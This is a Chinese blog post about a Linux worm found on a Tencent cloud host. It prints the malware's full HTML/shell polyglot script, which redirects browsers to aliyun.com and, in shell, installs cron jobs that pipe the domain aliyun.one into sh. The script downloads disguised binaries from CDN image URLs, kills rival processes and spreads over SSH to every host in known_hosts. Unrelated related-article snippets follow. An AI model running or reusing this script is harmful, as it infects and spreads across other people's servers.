群里有人问为什么在腾讯主机里看到有阿里云的链接, 难道是商业竞争吗?

好久之前的事了, 看了一下放在硬盘里, 得找个地方丢, 准备丢在博客上来。

群里有人问为什么在腾讯主机里看到有阿里云的链接, 难道是商业竞争吗?

我一看 aliyun.one ?
立刻想到是钓鱼网站吗? 阿里云有这域名我怎么不知道? 然后使用 dns 查询工具, 查到所有响应的节点都在境外.
我在国内 dns 怎么是境外? 已经确定是病毒了.
使用浏览器打开这个网址, 发现立刻跳转到了 aliyun.com , 不知道的还以为是真的阿里云.

然后 curl 一下, 发现内容不一样了, 发现里面有 html 和 shell .
html 用来跳转到 aliyun.com , shell 用来在 linux 上运行. 分别使用了不同的注释了避免干扰, 很有意思.

简单看了下, 会进行定时执行, 根据内核执行二进制代码, 还有感染其他主机…

https://www.v2ex.com/amp/t/626230/1
https://blog.csdn.net/xujiamin0022016/article/details/103319879

病毒涉及的文件:

这里仅展示首页文件, 看了一下, 我这个前端搬砖仔感受到了人家的思路新奇, 唯有感叹.

#<script>window.location.href="http://aliyun.com";</script><!--
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mv /bin/wge /bin/wget
mv /bin/cur /bin/curl
mv /usr/bin/wge /usr/bin/wget
mv /usr/bin/cur /usr/bin/curl
mkdir -p /tmp
chmod 1777 /tmp
echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c ‘import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())‘)|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin

*/10 * * * * root (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c ‘import urllib;print(urllib.urlopen("http://aliyun.one").read())‘||/usr/local/sbin/6be3a53abd)|sh
EOF
swapoff -a
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
grep -RE "(wget|curl)" /etc/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
grep -RE "(wget|curl)" /var/spool/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
netstat -anp|grep :::6345|awk ‘{print $7}‘|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 119.9.76.107:443|awk ‘{print $7}‘|sed -e "s/\/.*//g"|xargs kill -9
cd /tmp
touch /usr/local/bin/writeablex && cd /usr/local/bin/
touch /usr/libexec/writeablex && cd /usr/libexec/
touch /usr/bin/writeablex && cd /usr/bin/
rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex

export PATH=$PATH:$(pwd)
a64="img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png"
a32="img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png"
b64="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png"
b32="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png"
c64="https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png"
c32="https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png"
if [ ! -f "6be3a53abd" ]; then
    ARCH=$(getconf LONG_BIT)
    if [ ${ARCH}x = "64x" ]; then
        (curl -fsSL -m180 $a64 -o 6be3a53abd||wget -T180 -q $a64 -O 6be3a53abd||python -c ‘import urllib;urllib.urlretrieve("http://‘$a64‘", "6be3a53abd")‘||curl -fsSL -m180 $b64 -o 6be3a53abd||wget -T180 -q $b64 -O 6be3a53abd||python -c ‘import urllib;urllib.urlretrieve("http://‘$b64‘", "6be3a53abd")‘||curl -fsSL -m180 $c64 -o 6be3a53abd||wget -T180 -q $c64 -O 6be3a53abd||python -c ‘import urllib;urllib.urlretrieve("‘$c64‘", "6be3a53abd")‘)
    else
        (curl -fsSL -m180 $a32 -o 6be3a53abd||wget -T180 -q $a32 -O 6be3a53abd||python -c ‘import urllib;urllib.urlretrieve("http://‘$a32‘", "6be3a53abd")‘||curl -fsSL -m180 $b32 -o 6be3a53abd||wget -T180 -q $b32 -O 6be3a53abd||python -c ‘import urllib;urllib.urlretrieve("http://‘$b32‘", "6be3a53abd")‘||curl -fsSL -m180 $c32 -o 6be3a53abd||wget -T180 -q $c32 -O 6be3a53abd||python -c ‘import urllib;urllib.urlretrieve("‘$c32‘", "6be3a53abd")‘)
    fi
fi
chmod +x 6be3a53abd
$(pwd)/6be3a53abd || ./6be3a53abd || /usr/bin/6be3a53abd || /usr/libexec/6be3a53abd || /usr/local/bin/6be3a53abd || 6be3a53abd || /tmp/6be3a53abd || /usr/local/sbin/6be3a53abd
if [ -f /root/.ssh/known_hosts ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c ‘import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())‘)|sh >/dev/null 2>&1 &";done
fi

for file in /home/*
do
    if test -d $file; then
        if [ -f $file/.ssh/known_hosts ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c ‘import urllib;print(urllib.urlopen(\"http://aliyun.one\").read())‘)|sh >/dev/null 2>&1 &";done
        fi
    fi
done
#-->

所有关联的文件: aliyun.one.zip

就不直接贴出来了。

?

原文地址:https://www.cnblogs.com/daysme/p/12588170.html

时间: 2024-11-10 14:14:57

群里有人问为什么在腾讯主机里看到有阿里云的链接, 难道是商业竞争吗?的相关文章

【转载】如果有人问你数据库的原理,叫他看这篇文章

原文:如果有人问你数据库的原理,叫他看这篇文章 本文由 伯乐在线 - Panblack 翻译,黄利民 校稿.未经许可,禁止转载!英文出处:Christophe Kalenzaga.欢迎加入翻译组. 一提到关系型数据库,我禁不住想:有些东西被忽视了.关系型数据库无处不在,而且种类繁多,从小巧实用的 SQLite 到强大的 Teradata .但很少有文章讲解数据库是如何工作的.你可以自己谷歌/百度一下『关系型数据库原理』,看看结果多么的稀少[译者注:百度为您找到相关结果约1,850,000个…] 

[转]如果有人问你数据库的原理,叫他看这篇文章

推荐一篇文章:http://blog.jobbole.com/100349/  --原文出处 一提到关系型数据库,我禁不住想:有些东西被忽视了.关系型数据库无处不在,而且种类繁多,从小巧实用的 SQLite 到强大的 Teradata .但很少有文章讲解数据库是如何工作的.你可以自己谷歌/百度一下『关系型数据库原理』,看看结果多么的稀少[译者注:百度为您找到相关结果约1,850,000个…] ,而且找到的那些文章都很短.现在如果你查找最近时髦的技术(大数据.NoSQL或JavaScript),你

如果有人问你数据库的原理,叫他看这篇文章

一提到关系型数据库,我禁不住想:有些东西被忽视了.关系型数据库无处不在,而且种类繁多,从小巧实用的 SQLite 到强大的 Teradata .但很少有文章讲解数据库是如何工作的.你可以自己谷歌/百度一下『关系型数据库原理』,看看结果多么的稀少[译者注:百度为您找到相关结果约1,850,000个-] ,而且找到的那些文章都很短.现在如果你查找最近时髦的技术(大数据.NoSQL或JavaScript),你能找到更多深入探讨它们如何工作的文章. 难道关系型数据库已经太古老太无趣,除了大学教材.研究文

有人问我公理和正义的问题,

有人问我公理和正义的问题写在一封缜密工整的信上,从外县市一小镇寄出,署了真实姓名和身分证号码年龄(窗外在下雨,点滴芭蕉叶和围墙上的碎玻璃),籍贯,职业(院子里堆积许多枯树枝一只黑鸟在扑翅).他显然历经苦思不得答案,关于这么重要的一个问题.他是善于思维的,文字也简洁有力,结构圆融书法得体(乌云向远天飞)晨昏练过玄秘塔大字,在小学时代家住渔港后街拥挤的眷村里大半时间和母亲在一起:他羞涩敏感,学了一口台湾国语没关系常常登高瞭望海上的船只看白云,就这样把皮肤晒黑了单薄的胸膛里栽培着小小孤独的心,他这样恳

前两天有人问怎么取得一个目录下的文件,下面就是例子

<%@ Language=VBScript %> <% '================================================================ '函数名称:FileList '函数功能:列出目录下所有文件 '主要参数说明: '1--FolderUrl 虚拟路径 不可为空 '2----FileExName 文件扩展名 '函数返回值:收文记录 '====================================================

[ZZ]如果有人问你数据库的原理,叫他看这篇文章

如果有人问你数据库的原理,叫他看这篇文章 http://blog.jobbole.com/100349/ 文章把知识链都给串起来,对数据库做一个概述. 合并排序 阵列.树和哈希表 B+树索引概述 数据库的全局概述 基于成本的优化概述,特别专注了联接运算 缓冲池管理概述 事务管理概述

在阿里云入了大坑, 园子里的大神, 求搭救

在阿里云入了大坑, 园子里的大神, 有谁在香港知道有好的服务器IDC呢 本月从2号到11号, 在香港阿里云这边放了几组服务器, 一直丢包, 上次也发过这样的博文, 一直没得到解决, 跳进大坑啦, 向园子大神求助, 香港地区哪有稳定点的机房呢? 今天周未, 本来是特开心的一天, 又给这货坑坏了, 大家看下面 不知大家能不能接受这样的效果. 工单早上填了到现在有人回复, 和上次的是一样, 主机CPU/IO/流量正常,80正常 看到了没办法, 打95187这个客服电话, 更气的是, 我是客服, 你要填

国内云存储对比: 阿里云、腾讯云、Ucloud、首都在线

阿里云的数据存储<http://www.aliyun.com/product/rds/> RDS - 关系型数据库服务(Relational Database Service,简称RDS)是一种即开即用.稳定可靠.可弹性伸缩的在线数据库服务.具有多重安全防护措施和完善的性能监控体系,并提供专业的数据库备份.恢复及优化方案,使您能专注于应用开发和业务发展. OTS-开放结构化数据服务(Open Table Service,OTS)是构建在阿里云飞天分布式系统之上的NoSQL数据库服务,提供海量结

云计算之路-阿里云上:重启 manager 节点引发 docker swarm 集群宕机

为了迎接春节假期后的访问高峰,我们今天对 docker swarm 集群进行了变更操作,购买了1台阿里云4核8G的服务器作为 worker 节点,由原来的  3 manager nodes + 2 worker nodes 变为  3 manager nodes + 3 worker nodes . 晚上,我们对已经持续运行一段时间的5个节点逐一进行重启操作,重启方式如下: 1)docker node update --availability drain 让节点下线2)阿里云控制台重启服务器3